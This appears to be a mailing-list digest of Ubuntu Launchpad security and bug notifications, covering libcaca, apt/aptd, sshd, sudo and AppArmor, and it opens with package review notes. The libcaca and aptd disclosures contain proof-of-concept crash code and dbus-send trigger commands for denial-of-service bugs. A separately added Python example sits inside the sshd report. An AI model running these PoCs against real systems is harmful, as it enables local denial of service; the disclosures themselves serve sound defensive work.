  [Security]
  No CVEs for ccid are listed in our database.
  Doesn't appear to bind to a socket.
  No privileged executables, but does have udev rules.
  Probably needs a security review.

  [Quality assurance]
  No test suite.
  Does require odd hardware that we'll probably need to buy.
  I don't see debconf questions.
  ccid is well maintained in Debian by upstream author.
  One open wishlist bug in BTS, harmless.

  One open bug in launchpad, not security, but looks very frustrating
  for the users. The upstream author was engaged but it never reached
  resolution.  https://bugs.launchpad.net/ubuntu/+source/ccid/+bug/1175465

  Has a debian/watch file.
  Quilt packaging.

  P: ccid source: no-dep5-copyright
  P: ccid source: package-uses-experimental-debhelper-compat-version 13

  [Dependencies]
  Minimal dependencies, in main

  [Standards compliance]
  Appears to satisfy FHS and Debian policy

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  ccid provides drivers to interact with usb-connected smart card readers.

  ==> libpam-pkcs11 <==
  [Availability]
  Source package pam-pkcs11 is in universe and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  No CVEs in our database.
  Doesn't appear to bind to sockets.
  No privileged executables (but is a PAM module).
  As a PAM module this will require a security review.

  [Quality assurance]
  The package does not call pam-auth-update in its postinst #1650366
  Does not ask questions during install.
  One Ubuntu bug claims very poor behaviour if a card isn't plugged in.
  No Debian bugs.
  Occasional updates in Debian by long-term maintainer.
  Does require odd hardware that we'll probably need to buy.
  Does not appear to run tests during build.
  Has scary warnings in the build logs.
  Has a debian/watch file.

  Ancient standards version; other smaller lintian messages, mostly
  documentation problems.

  Quilt packaging.

  [Dependencies]
  Depends on libcurl4, libldap-2.4-2, libpam0g, libpcsclite1, libssl1.1
  All are in main.

  [Standards compliance]
  The package does not call pam-auth-update in its postinst #1650366
  Otherwise looks to conform to FHS and Debian policies

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  This PAM module can use CRLs and full-chain verification of certificates.
  It can also do LDAP, AD, and Kerberos username mapping.

  ==> libpcsc-perl <==
  [Availability]
  Source package pcsc-perl is in universe, builds for all architectures,
  plus i386

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  There are no cves for pcsc-perl in our database.
  No privileged executables.
  Doesn't appear to bind to sockets.
  Probably needs a security review.

  [Quality assurance]
  Library package not intended to be used directly.
  No debconf questions.
  No bugs in Debian.
  No bugs in Ubuntu.
  Does require odd hardware that we'll probably need to buy.
  Tests exist, not run during the build; probably can't run during the build.
  Includes debian/watch file.
  A handful of lintian issues
  Quilt packaging.

  [Dependencies]
  libpcsc-perl depends upon libpcsclite1, libc6, perl, perlapi-5.30.0.
  All are in main.

  [Standards compliance]
  One oddity, Card.pod is stored in 
/usr/lib/x86_64-linux-gnu/perl5/5.30/Chipcard/PCSC/
  Many other perl packages have .pod files in these directory trees so maybe
  it's fine, but it seems 

[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow

2021-04-09 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I use libfuzzer to test the libcaca API. I found two crashes

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file (as call stack):

   -> caca_export_canvas_to_memory()  in libcaca/caca/codec/export.c
   -> caca_export_memory()            in libcaca/caca/codec/export.c
   -> export_tga()                    in libcaca/caca/codec/export.c
   -> export_troff()                  in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <stdint.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"troff",&len);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
   return 0;

  }

  
  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include <stdint.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"tga",&len);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
 return 0;
  }

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;
  }
  EOF

  clang++ -g poc_tga.cc -O2 -fno-omit-frame-pointer 

[Touch-packages] [Bug 1923262] Re: backup /etc/passwd- file should be mode 0600

2021-04-09 Thread Seth Arnold
Hello, this sounds like surprising advice to me -- after all the
/etc/passwd file is 644. I don't know what would be the point of hiding
this 'backup' file. Does the benchmark give a rationale for this?

Thanks

** Information type changed from Private Security to Public Security

** Changed in: shadow (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1923262

Title:
  backup /etc/passwd- file should be mode 0600

Status in shadow package in Ubuntu:
  Incomplete

Bug description:
  CIS hardening benchmarks (6.1.6) suggest that the /etc/passwd- file
  should be mode 0600 (or more restrictive).

  However, this file is 0644 after it is created when the /etc/passwd
  file is modified. (Ie, a hardening script that creates a hardened
  system for initial use could change this mode, but it will go out of
  compliance the next time a backup file is made.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1923262/+subscriptions



[Touch-packages] [Bug 1921552] Re: xscreensavers

2021-04-05 Thread Seth Arnold
Thank you for taking the time to report this bug and helping to make
Ubuntu better.  Reviewing your dmesg attachment to this bug report it
seems that there may be a problem with your hardware.  I'd recommend
performing a back up and then investigating the situation.  Measures you
might take include checking cable connections and using software tools
to investigate the health of your hardware.  In the event that it is not
in fact an error with your hardware please set the bug's status back to
New.  Thanks and good luck!

** Changed in: xorg (Ubuntu)
   Status: Fix Released => Invalid

** Changed in: xorg (Ubuntu)
   Importance: Undecided => Low

** Tags added: hardware-error

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1921552

Title:
  xscreensavers

Status in xorg package in Ubuntu:
  Invalid

Bug description:
  Something about 'daemon' or 'run demo'

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: xorg 1:7.7+19ubuntu14
  ProcVersionSignature: Ubuntu 5.4.0-70.78-generic 5.4.94
  Uname: Linux 5.4.0-70-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Fri Mar 26 16:31:19 2021
  DistUpgraded: 2021-01-08 14:56:49,798 DEBUG icon theme changed, re-reading
  DistroCodename: focal
  DistroVariant: ubuntu
  ExtraDebuggingInterest: I just need to know a workaround
  GraphicsCard:
   Advanced Micro Devices, Inc. [AMD/ATI] Wrestler [Radeon HD 6310] [1002:9802] 
(prog-if 00 [VGA controller])
 Subsystem: Lenovo Wrestler [Radeon HD 6310] [17aa:397f]
  InstallationDate: Installed on 2020-12-18 (98 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 
(20140722.2)
  MachineType: LENOVO 2181
  ProcEnviron:
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.4.0-70-generic 
root=UUID=c44a1ac5-9dee-4bf8-a246-6303f68e5c24 ro quiet splash
  SourcePackage: xorg
  UpgradeStatus: Upgraded to focal on 2021-01-08 (77 days ago)
  dmi.bios.date: 10/02/2012
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 6CCN93WW(V8.05)
  dmi.board.asset.tag: No Asset Tag
  dmi.board.name: Lenovo G585
  dmi.board.vendor: LENOVO
  dmi.board.version: 3193WIN8 STD MLT
  dmi.chassis.asset.tag: No Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Lenovo G585
  dmi.modalias: 
dmi:bvnLENOVO:bvr6CCN93WW(V8.05):bd10/02/2012:svnLENOVO:pn2181:pvrLenovoG585:rvnLENOVO:rnLenovoG585:rvr3193WIN8STDMLT:cvnLENOVO:ct10:cvrLenovoG585:
  dmi.product.family: IDEAPAD
  dmi.product.name: 2181
  dmi.product.sku: LENOVO_MT_2181
  dmi.product.version: Lenovo G585
  dmi.sys.vendor: LENOVO
  version.compiz: compiz 1:0.9.14.1+20.04.20200211-0ubuntu1
  version.libdrm2: libdrm2 2.4.102-1ubuntu1~20.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 20.2.6-0ubuntu0.20.04.1
  version.libgl1-mesa-glx: libgl1-mesa-glx 20.2.6-0ubuntu0.20.04.1
  version.xserver-xorg-core: xserver-xorg-core 2:1.20.9-2ubuntu1.2~20.04.1
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.6-1
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20200226-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1
  xserver.bootTime: Tue Feb  9 06:34:08 2021
  xserver.configfile: default
  xserver.logfile: /var/log/Xorg.0.log
  xserver.version: 2:1.20.9-2ubuntu1.2~20.04.1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1921552/+subscriptions



[Touch-packages] [Bug 1922212] Re: SSHD does not honor configuration files

2021-04-01 Thread Seth Arnold
Hello Jeffrey, this reminds me a little of
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1876320 -- but
it's also something that should have been addressed last year.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1922212

Title:
  SSHD does not honor configuration files

Status in openssh package in Ubuntu:
  New

Bug description:
  I'm working on Ubuntu 20, x86_64, fully patched.

 # lsb_release -a
 Distributor ID:Ubuntu
 Description:   Ubuntu 20.04.2 LTS
 ...

  We are seeing reports of failed password-based logins using root:

 journalctl -xe
 ...
 Apr 01 09:08:21 localhost sshd[239302]: Failed password for root from 49.88.112.77 port 36206 ssh2
 Apr 01 09:08:21 localhost sshd[239302]: Failed password for root from 49.88.112.77 port 36206 ssh2
 ...

  There are three attempts every second or two (literally):

 # journalctl -xe | grep -i -c 'Failed password for root'
 324

  Our OpenSSH server is configured with both no-password based logins
  and no-root logins.

 # ls /etc/ssh/sshd_config.d/
 10_pubkey_auth.conf  20_disable_root_login.conf

 # cat /etc/ssh/sshd_config.d/10_pubkey_auth.conf 
 # Disable passwords
 PasswordAuthentication no
 ChallengeResponseAuthentication no
 UsePAM no
 # Enable public key
 PubkeyAuthentication yes

 # cat /etc/ssh/sshd_config.d/20_disable_root_login.conf 
 PermitRootLogin no

  The config files are included last in our /etc/ssh/sshd_config file:

 # tail -n 3 /etc/ssh/sshd_config

 # For some reason OpenSSH does not include additional conf files by default.
 Include /etc/ssh/sshd_config.d/*.conf

  I dislike modifying /etc/ssh/sshd_config since it will be overwritten
  by the distro. With that said, I modified it without success.

  It really annoys me that we can't secure this service. Something looks
  very broken here.

  -

  # apt-cache show openssh-server
  Package: openssh-server
  Architecture: amd64
  Version: 1:8.2p1-4ubuntu0.2
  Multi-Arch: foreign
  Priority: optional
  Section: net
  Source: openssh
  Origin: Ubuntu
  Maintainer: Ubuntu Developers 
  Original-Maintainer: Debian OpenSSH Maintainers 
  Bugs: https://bugs.launchpad.net/ubuntu/+filebug

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1922212/+subscriptions
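
sshd_config(5) documents that the first value obtained for a keyword is used and that Include globs expand in lexical order at the point where the Include line appears, so the position of the Include line decides whether drop-in files can take effect. The added example below (not from the report or from OpenSSH) resolves the effective global values for the two drop-ins quoted above; the earlier main-file directives are constructed, because the report shows only the file's last three lines, and Match blocks are not modelled.

```python
"""Resolve effective global sshd_config values (first value obtained wins)."""
import fnmatch

MAIN = "/etc/ssh/sshd_config"

# Drop-in files as quoted in the report.
DROPINS = {
    "/etc/ssh/sshd_config.d/10_pubkey_auth.conf": (
        "# Disable passwords\n"
        "PasswordAuthentication no\n"
        "ChallengeResponseAuthentication no\n"
        "UsePAM no\n"
        "# Enable public key\n"
        "PubkeyAuthentication yes\n"
    ),
    "/etc/ssh/sshd_config.d/20_disable_root_login.conf": "PermitRootLogin no\n",
}

INCLUDE = "Include /etc/ssh/sshd_config.d/*.conf\n"
# Constructed: these earlier directives are an assumption for the
# demonstration, not lines taken from the reporter's sshd_config.
EARLIER = "PermitRootLogin yes\nPasswordAuthentication yes\n"
MAIN_INCLUDE_LAST = EARLIER + "\n" + INCLUDE
MAIN_INCLUDE_FIRST = INCLUDE + "\n" + EARLIER


def effective_settings(main_text, dropins=DROPINS):
    """Return {keyword: (value, path, line_number)} for global directives.

    The file set is an in-memory stand-in for /etc/ssh, so nothing is read
    from disk. Parsing of a file stops at its first Match line.
    """
    files = dict(dropins)
    files[MAIN] = main_text
    settings = {}

    def load(path, depth=0):
        if depth > 16:
            raise ValueError("Include nesting too deep")
        for lineno, raw in enumerate(files[path].splitlines(), 1):
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            parts = line.split(None, 1)
            keyword = parts[0].lower()  # keywords are case-insensitive
            value = parts[1].strip() if len(parts) > 1 else ""
            if keyword == "match":  # conditional blocks are not modelled
                return
            if keyword == "include":
                for pattern in value.split():
                    # fnmatch stands in for glob(7) over the in-memory files
                    matches = sorted(
                        p for p in files if fnmatch.fnmatchcase(p, pattern)
                    )
                    for included in matches:
                        load(included, depth + 1)
                continue
            # First value obtained wins; later occurrences are ignored.
            settings.setdefault(keyword, (value, path, lineno))

    load(MAIN)
    return settings


if __name__ == "__main__":
    for label, text in (("Include last", MAIN_INCLUDE_LAST),
                        ("Include first", MAIN_INCLUDE_FIRST)):
        result = effective_settings(text)
        print(label)
        for key in ("passwordauthentication", "permitrootlogin"):
            value, path, lineno = result[key]
            print(f"  {key} = {value}  ({path}:{lineno})")
```

On a live host, `sshd -T` run as root prints the configuration sshd actually resolved, which can be compared against the drop-in files.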



[Touch-packages] [Bug 1921423] Re: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: o subprocesso instalado, do pacote sudo, o script post-installation retornou erro do status de saída 1

2021-03-25 Thread Seth Arnold
Hello Alex, I would guess that the reason why the permissions are
incorrect is probably whatever tool added four copies of this to your
sudoers:

ALL ALL=(ALL) NOPASSWD:/usr/share/dtsremoter/remoterserver
ALL ALL=(ALL) NOPASSWD:/usr/share/dtsremoter/remoterdelegate

Any tool that would do that is probably pretty poorly written. That's my
guess where to lay blame.

If you don't have any open root command shells, I suggest rebooting into
a recovery mode to change the permissions on the file. If you get the
same "Operação não permitida" response, try chattr -i /etc/sudoers and
then try again.

Thanks

** Changed in: sudo (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1921423

Title:
  package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: o
  subprocesso instalado, do pacote sudo, o script post-installation
  retornou erro do status de saída 1

Status in sudo package in Ubuntu:
  Incomplete

Bug description:
  The privileges of my /etc/sudoers file is 220. I don't have any idea
  on how it was changed, and I tried many different ways to chmod it and
  I didn't get to do it, even booting from another media and trying to
  chmod the file didn't work.

  It's the main reason of the many errors that started happening when
  updating this machine.

  I can't stop this machine now, and I don't want to run the risk of
  trying to use the installation software to try to repair it.

  If you have any idea on how to chmod the file, I'll be grateful.

  Best regards,

  Alex Leandro Rosa

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: sudo 1.8.31-1ubuntu1.2
  ProcVersionSignature: Ubuntu 5.4.0-70.78-generic 5.4.94
  Uname: Linux 5.4.0-70-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Thu Mar 25 15:00:47 2021
  ErrorMessage: o subprocesso instalado, do pacote sudo, o script 
post-installation retornou erro do status de saída 1
  InstallationDate: Installed on 2018-12-12 (833 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: sudo
  Title: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: o 
subprocesso instalado, do pacote sudo, o script post-installation retornou erro 
do status de saída 1
  UpgradeStatus: Upgraded to focal on 2020-09-30 (175 days ago)
  VisudoCheck:
   /etc/sudoers: análise OK
   /etc/sudoers.d/README: análise OK
  mtime.conffile..etc.sudoers: 2020-12-30T18:27:17.782421

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1921423/+subscriptions



[Touch-packages] [Bug 1766628] Re: apparmor denies VLC to open files in devmode

2021-03-19 Thread Seth Arnold
AppArmor just enforces the policies that were given to it; please report
this issue to whoever packaged the snap you're using.

Thanks

** Changed in: apparmor (Ubuntu)
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1766628

Title:
  apparmor denies VLC to open files in devmode

Status in apparmor package in Ubuntu:
  Invalid

Bug description:
  I see failures in VLC trying to open files and prefs while VLC snap
  seemingly uses devmode since this is on Debian "testing".

  Failures:
  Apr 24 17:50:24 coal kernel: [ 7997.906298] audit: type=1400 
audit(1524581424.694:1944): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:24 coal kernel: [ 7997.906308] audit: type=1400 
audit(1524581424.694:1945): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel.tbcache" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:24 coal kernel: [ 7997.912113] audit: type=1400 
audit(1524581424.698:1946): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:24 coal kernel: [ 7997.912122] audit: type=1400 
audit(1524581424.698:1947): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel" pid=19173 
comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:28 coal kernel: [ 8001.418173] audit: type=1400 
audit(1524581428.206:1948): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.418180] audit: type=1400 
audit(1524581428.206:1949): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel.tbcache" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:28 coal kernel: [ 8001.422473] audit: type=1400 
audit(1524581428.210:1950): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.422481] audit: type=1400 
audit(1524581428.210:1951): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel" pid=19173 
comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:28 coal kernel: [ 8001.556305] audit: type=1400 
audit(1524581428.342:1952): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/run/user/1000/snap.vlc/#511744" pid=19173 comm="vlc" requested_mask="l" 
denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.556318] audit: type=1400 
audit(1524581428.342:1953): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" name="/run/user/1000/snap.vlc/vlcxkYxzT.1.slave-socket" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/run/user/1000/snap.vlc/#511744"
  Apr 24 17:50:28 coal kernel: [ 8001.556324] audit: type=1400 
audit(1524581428.342:1954): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/run/user/1000/snap.vlc/#511744" pid=19173 comm="vlc" requested_mask="l" 
denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.556332] audit: type=1400 
audit(1524581428.342:1955): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" name="/run/user/1000/snap.vlc/vlcbTrpmK.1.slave-socket" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/run/user/1000/snap.vlc/#511744"
  Apr 24 17:50:28 coal kernel: [ 8001.556338] audit: type=1400 
audit(1524581428.342:1956): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/run/user/1000/snap.vlc/#511744" pid=19173 comm="vlc" 

[Touch-packages] [Bug 1899193] Re: local denial of service due to parsing bugs in arfile.cc

2021-02-26 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1899193

Title:
  local denial of service due to parsing bugs in arfile.cc

Status in apt package in Ubuntu:
  Fix Released
Status in aptdaemon package in Ubuntu:
  Fix Released
Status in python-apt package in Ubuntu:
  Fix Released

Bug description:
  # GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-168`, `GHSL-2020-169`, `GHSL-2020-170`

  The [GitHub Security Lab](https://securitylab.github.com) team has
  identified potential security vulnerabilities in aptd.

  We are committed to working with you to help resolve these issues. In
  this report you will find everything you need to effectively
  coordinate a resolution of these issues with the GHSL team.

  If at any point you have concerns or questions about this process,
  please do not hesitate to reach out to us at `security...@github.com`
  (please include `GHSL-2020-168`, `GHSL-2020-169`, or `GHSL-2020-170`
  as a reference).

  If you are _NOT_ the correct point of contact for this report, please
  let us know!

  ## Summary

  The aptd daemon is a system service for installing and updating
  packages. It is accessible via
  [dbus](https://www.freedesktop.org/wiki/Software/dbus/) and has a
  method named "InstallFile" which is used for installing local `.deb`
  packages. Although polkit is used to prevent an unprivileged user from
  using "InstallFile" to install a malicious `.deb` package, it does not
  prevent aptd from parsing the contents of the `.deb` file. The parsing
  logic is provided by two packages,
  [libapt-pkg-dev](https://packages.ubuntu.com/focal/libapt-pkg-dev) and
  [python-apt](https://packages.ubuntu.com/source/focal/python-apt), and is
  implemented in C. These two packages contain several bugs, which an
  unprivileged user can exploit to trigger a local denial of service
  attack.

  ## Product

  aptd

  ## Tested Version

  * libapt-pkg-dev: version 2.0.2ubuntu0.1
  * python-apt: 2.0.0ubuntu0.20.04.1
  * Tested on Ubuntu 20.04.1 LTS

  ## Details

  ### Issue 1: aptd crash due to integer overflow in arfile.cc (GHSL-2020-168)

  A crafted `.deb` package can trigger a negative integer overflow at
  [arfile.cc, line 116](https://git.launchpad.net/ubuntu/+source/apt/tree/apt-pkg/contrib/arfile.cc?h=applied/ubuntu/focal-updates=4c264e60b524855b211751e1632ba48526f6b44d#n116):

  ```c
  Memb->Size -= Len;
  ```

  Due to the integer overflow, the value of `Memb->Size` is
  `0x`. This leads to an out-of-memory error at
  [arfile.cc, line 602](https://git.launchpad.net/ubuntu/+source/python-apt/tree/python/arfile.cc?h=applied/ubuntu/focal-updates=0f7cc93acdb51d943114f1cd79002288c4ca4d24#n602):

  ```c
  char* value = new char[member->Size];
  ```

  The out-of-memory error causes aptd to crash.

  Please note that the source locations above refer to two separate
  files, both named `arfile.cc`. The first is from the libapt-pkg-dev
  package and the second is from the python-apt package.

  To trigger the crash, first use the attached source file named
  "createdeb.c" to generate the malicious `.deb` file:

  ```bash
  gcc createdeb.c -o createdeb
  ./createdeb crash test.deb
  ```

  Now use `dbus-send` to send the malicious `.deb` file to aptd:

  ```bash
  $ dbus-send --system --type="method_call" --print-reply --dest=org.debian.apt /org/debian/apt org.debian.apt.InstallFile string:`realpath test.deb` boolean:true
  method return time=1602245339.731762 sender=:1.287 -> destination=:1.288 serial=8 reply_serial=2
     string "/org/debian/apt/transaction/90f29de930854568964af1918f6ca5eb"
  $ dbus-send --system --type="method_call" --print-reply --dest=org.debian.apt /org/debian/apt/transaction/90f29de930854568964af1918f6ca5eb org.debian.apt.transaction.Run
  ```

  Note that you need to use the "transaction id" returned by the first
  `dbus-send` in the second `dbus-send` command.

  #### Impact

  This issue may lead to local denial of service.

  #### Resources

  I have attached `createdeb.c`, which can be used to generate the
  malicious `.deb` file.

  ### Issue 2: aptd infinite loop due to integer overflow in arfile.cc (GHSL-2020-169)

  This issue is very similar to issue 1, but is caused by a different
  bug. This bug occurs during the call to `StrToNum` at
  [arfile.cc, line 92](https://git.launchpad.net/ubuntu/+source/apt/tree/apt-pkg/contrib/arfile.cc?h=applied/ubuntu/focal-updates=4c264e60b524855b211751e1632ba48526f6b44d#n92):

  ```c
  StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
  ```

  The bug is due to the use of `strtoul` in
  [StrToNum](https://git.launchpad.net/ubuntu/+source/apt/tree/apt-pkg/contrib/strutl.cc?h=applied/ubuntu/focal-updates=4c264e60b524855b211751e1632ba48526f6b44d#n1169):

